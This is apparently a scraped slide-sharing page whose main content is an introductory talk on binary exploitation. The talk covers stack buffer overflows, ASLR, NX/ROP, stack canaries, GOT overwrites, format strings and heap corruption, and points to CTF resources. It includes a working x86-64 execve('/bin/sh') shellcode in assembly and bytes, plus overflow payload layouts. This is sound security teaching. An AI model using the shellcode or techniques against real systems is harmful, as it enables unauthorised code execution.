UiPath Test Automation using UiPath Test Suite series, part 4UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4
DianaGray10
 
UiPath Test Automation using UiPath Test Suite series, part 3
UiPath Test Automation using UiPath Test Suite series, part 3UiPath Test Automation using UiPath Test Suite series, part 3
UiPath Test Automation using UiPath Test Suite series, part 3
DianaGray10
 
FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdfFIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance
 
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdfFIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance
 
Accelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish CachingAccelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish Caching
Thijs Feryn
 

Recently uploaded (20)

FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdfFIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
 
Welocme to ViralQR, your best QR code generator.
Welocme to ViralQR, your best QR code generator.Welocme to ViralQR, your best QR code generator.
Welocme to ViralQR, your best QR code generator.
 
How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...
 
By Design, not by Accident - Agile Venture Bolzano 2024
By Design, not by Accident - Agile Venture Bolzano 2024By Design, not by Accident - Agile Venture Bolzano 2024
By Design, not by Accident - Agile Venture Bolzano 2024
 
Securing your Kubernetes cluster_ a step-by-step guide to success !
Securing your Kubernetes cluster_ a step-by-step guide to success !Securing your Kubernetes cluster_ a step-by-step guide to success !
Securing your Kubernetes cluster_ a step-by-step guide to success !
 
GraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge GraphGraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge Graph
 
A tale of scale & speed: How the US Navy is enabling software delivery from l...
A tale of scale & speed: How the US Navy is enabling software delivery from l...A tale of scale & speed: How the US Navy is enabling software delivery from l...
A tale of scale & speed: How the US Navy is enabling software delivery from l...
 
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
 
PCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase TeamPCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase Team
 
The Art of the Pitch: WordPress Relationships and Sales
The Art of the Pitch: WordPress Relationships and SalesThe Art of the Pitch: WordPress Relationships and Sales
The Art of the Pitch: WordPress Relationships and Sales
 
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdfFIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
 
When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...
 
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
 
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
 
The Future of Platform Engineering
The Future of Platform EngineeringThe Future of Platform Engineering
The Future of Platform Engineering
 
UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4
 
UiPath Test Automation using UiPath Test Suite series, part 3
UiPath Test Automation using UiPath Test Suite series, part 3UiPath Test Automation using UiPath Test Suite series, part 3
UiPath Test Automation using UiPath Test Suite series, part 3
 
FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdfFIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdf
 
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdfFIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
 
Accelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish CachingAccelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish Caching
 

[DSC] Introduction to Binary Exploitation

  • 2. Proprietary Proprietary ● MSc in Computer Science, KTH ● Security Engineer @ Google - Offensive Security ● CTF Player: HackingForSoju ● Email: zetatwo@google.com / Twitter: @zetatwo Biography
  • 3. Proprietary Agenda ● Background ● Stack-based Exploitation ● Protections and bypasses ● Heap-based exploitations ● Next steps
  • 5. Proprietary Proprietary ● Programmer ● Security Interested ● Basic knowledge of some low-level language, e.g. C or C++ ● Basic understanding of operating systems Who Are You?
  • 6. Proprietary Proprietary What is an Exploit? ● Unintended behaviour ● State machine ○ Initial state ○ Reachable state ○ Invalid state ● Vulnerability ○ Unintended transition (bug) ○ Enabling an exploit ● Exploit ○ Transition to an Invalid state ○ "Dangerous" subset
  • 7. Proprietary Proprietary A Note on Data ● We organize bits into groups - nibble, byte, word, dword, qword ● Bits are interpreted as integers, text, code, addresses, etc. ● Same data, different interpretations - Context determines ● Remember endianness - Little vs big 65, 66, 67, 68 "ABCD" inc ecx; inc edx; inc ebx; inc esp 0x44434241 = 1145258561 Little: 0x44332211 = 0x11 0x22 0x33 0x44 Big: 0x44332211 = 0x44 0x33 0x22 0x11
  • 8. Proprietary Proprietary Where are We? ● Physics - Maxwell’s equations ● Circuits - Gates, flip-flops, wires ● Micro-architecture - Internals of CPU ● Machine code - Assembly translated to bytes ● Low-level code - C, Rust ● Mid-level code - Java, C# ● High-level code - Python, Javascript
  • 10. Proprietary Proprietary ● Virtual memory ● Stack ● Heap ● Code - Text x86 Memory
  • 11. Proprietary Proprietary ● General purpose ○ RAX, RBX, RCX, RDX ○ RDI, RSI, R8, R9 ● Special purpose ○ RIP, RBP, RSP ● ...and a few hundred more x86 Registers
  • 12. Proprietary Proprietary ● Architecture specific ● x86, 32 bit, 64 bit ● Arguments ○ 32 bit: stack in reverse order ○ 64 bit: first few in registers ● Stack frame - base pointer x86 Calling convention call 0xCAFEC0DE ... push eip+5 jmp 0xCAFEC0DE call rip+0x1337 ... push rip+5 jmp rip+0x1337 ret pop eip ret pop rip f(a, b) push b; push a call f f(a, b) mov rdi a; mov rsi b; call f
  • 14. Proprietary Proprietary ● Unchecked write ● Overwrite adjacent memory ● Overwrite return address Stack buffer Overflow void vuln() { long local1; char buf[16]; fgets(buf); } Program received signal SIGSEGV, Segmentation fault. 0x4B4B4B4B4A4A4A4A in example1 () [buf (16 bytes)] [local1 (8 bytes)] [saved bp (8 bytes)] [return address (8 bytes)] [AAAABBBBCCCCDDDD] [EEEEFFFF] [GGGGHHHH] [JJJJKKKK]
  • 15. Proprietary Proprietary ● Code that launches a shell ● Can also do other things ● Mostly written in C or ASM ● Needs to be location independent Shellcode xor rdx, rdx mov qword rbx, '//bin/sh' shr rbx, 0x8 push rbx mov rdi, rsp push rax push rdi mov rsi, rsp mov al, 0x3b syscall 0x48 0x31 0xd2 0x48 0xbb 0x2f 0x2f 0x62 0x69 0x6e 0x2f 0x73 0x68 0x48 0xc1 0xeb 0x08 0x53 0x48 0x89 0xe7 0x50 0x57 0x48 0x89 0xe6 0xb0 0x3b 0x0f 0x05
  • 16. Proprietary Proprietary ● No protections present ● No longer viable ● A simple attack ○ Inject code ○ Overwrite return address with shellcode location Stack buffer overflow -96 void vuln() { long local1; char buf[16]; fgets(buf); } $ uname -a Linux pwnbox 5.4.0-12.15-generic... [buf (16 bytes)] [local1 (8 bytes)] [saved bp (8 bytes)] [return address (8 bytes)] 0x00007FFFDEADC0DE: [0x48 0x31 0xd2 0x48 ...] [...] [... 0x3b 0x0f 0x05] [0x00007FFFDEADC0DE]
  • 17. Proprietary Proprietary ● Shellcode can be moved around ● For example further down the stack ● If exact location is unknown ○ NOP sled Shellcode placement void vuln() { long local1; char buf[12]; fgets(buf); } $ uname -a Linux pwnbox 5.4.0-12.15-generic... [buf (12 bytes)] [local1 (8 bytes)] [saved bp (8 bytes)] [return address (8 bytes)] [prev frame (? bytes)] 0x00007FFFDEADC0DE: [...] [...] [...] [0x00007FFFDEADC102] [0x48 0x31 0xd2 …]
  • 18. Proprietary Proprietary ● Address Space Layout Randomization ● Randomize location of stack and heap ○ 32 bit: 12 bit entropy ○ 64 bit: 28 bit entropy ● So far code location still known ● Location of buffer now unknown ● Code reuse ○ Gadgets Protection: ASLR -01 0x00007FFFCAFECAFE: jmp rsp $ uname -a Linux pwnbox 5.4.0-12.15-generic... [buf (16 bytes)] [local1 (8 bytes)] [saved bp (8 bytes)] [return address (8 bytes)] [prev frame (? bytes)] 0x????????: [...] [...] [...] [0x00007FFFCAFECAFE] [0x48 0x31 0xd2 …]
  • 19. Proprietary Proprietary ● Adds permission bits to memory ○ Code: RX ○ Heap+Stack: RW ● Shellcode on stack not possible ● Code location know ● Gadgets ○ Return-oriented programming Protection: NX/DEP -97 0x4000104A: ... pop eax ret 0x4000106A: ... pop ebx pop ecx ret 0x????????: [AAAA...DDDD] [EEEE] [FFFF] [0x4000104A] [0xDEADBEEF] [0x4000106A] [0xCAFEBABE] [0xFEEDF00D] eax = 0xDEADBEEF ebx = 0xCAFEBABE ecx = 0xFEEDF00D
  • 20. Proprietary Proprietary ● Catch the overflow before damage ● Canary - random secret value ● The crash becomes controlled ● Relies on canary being secret ○ Memory leak ○ Forking servers Protection: StackGuard -98 void vuln() { long local1; char buf[12]; fgets(buf); } *** stack smashing detected ***: ./a.out terminated ======= Backtrace: ========= SECRET = ??? [...] [...] [SECRET] [saved bp (8 bytes)] [return address (8 bytes)] [...] [...] [0x4141414141414141] [0x4141414141414141] [0x00007FFFDEADC0DE] void vuln() { push_cookie(); long local1; char buf[12]; fgets(buf); check_cookie(); }
  • 21. Proprietary Proprietary ● Program Linkage Table, PLT ● Global Offset Table, GOT ● PLT contains stubs with jumps ● GOT contains addresses to libraries ● Overwrite GOT entry and call function GOT/PLT Overwrite ... call printf@plt ... printf@plt: jmp [printf@got] printf@got: 0x7FFFC0DECAFE printf@got: 0x7FFFDEADDEAD … call printf@plt -> 0x7FFFDEADDEAD ...
  • 22. Proprietary Proprietary ● RELocation Read Only, RELRO ● “Partial RELRO” ○ GOT before BSS ● Full RELRO ○ Actually Read Only ○ Handled by loader Protection: RELRO ... call printf@plt ... printf@plt: jmp [printf@got] printf@got: 0x7FFFC0DECAFE printf@got: 0x7FFFDEADDEAD … call printf@plt -> 0x7FFFC0DECAFE ...
  • 23. Proprietary Proprietary ● Stack frames - linked list ● Misalign stack frame ○ Modify local variables ○ Modify stack pointer ● Partial overwrite ○ Shift stack frame Base Pointer Overwrite
  • 24. Proprietary Proprietary ● Control Flow Guard ● Control Flow Integrity ● Intended to prevent code-reuse attacks ● Bypass example: JIT Protection: CFG (-14)
  • 25. Proprietary Proprietary ● Pointer Authentication Code ● Reuse unused bits for MAC ● Hardware support ● ARM64, Apple iOS ● Bypass: signing oracle ○ Project Zero blog Protection: PAC (-17)
  • 26. Proprietary Proprietary ● Calls to printf-like functions ● Control over first argument ● Variable number of arguments ● Read direct: %x/%d ● Read indirect: %s ● Write: %n ● Copy: %0*x, %n ● Skip: %4$x Format String Vulnerability int printf ( const char * format, ... ); printf("Name: %s, age: %d", name, age); // Ok printf(name); // Vulnerable
  • 28. Proprietary Proprietary ● Physical ● Virtual ● Pages ● Memory allocator ○ malloc/free ○ glibc ○ jemalloc A Refresher on Memory
  • 29. Proprietary Proprietary ● Heap overflow ● Use after free ● Type confusion ● Heap spraying Heap corruption: app layer
  • 30. Proprietary Proprietary ● Corrupt allocator metadata ● Linked lists ● Requires understanding of allocator ○ Slabs ○ Bins ○ Cache ● glibc - House of X Heap corruption: allocator
  • 32. Proprietary Want to try it out? Capture the Flag Wargames Community https://capturetheflag.withgoogle.com https://ctftime.org https://picoctf.com https://github.com/zardus/wargame-nexus https://pwnable.kr https://overthewire.org CTF players Discord: https://discord.gg/ArjWjvctft
  • 33. Proprietary Further Materials Videos Tools Learning https://securitycreators.video https://www.youtube.com/GynvaelEN https://www.youtube.com/ZetaTwo https://www.youtube.com/LiveOverflow Python + Pwntools gdb + gef IDA, Binary Ninja, Ghidra https://pwn.college https://github.com/RPISEC/MBE https://github.com/shellphish/how2heap
  • 34. Proprietary Interested in Google? Internships and full-time positions: https://careers.google.com/students Questions about working at Google, specifically security: Email zetatwo@google.com or Twitter @zetatwo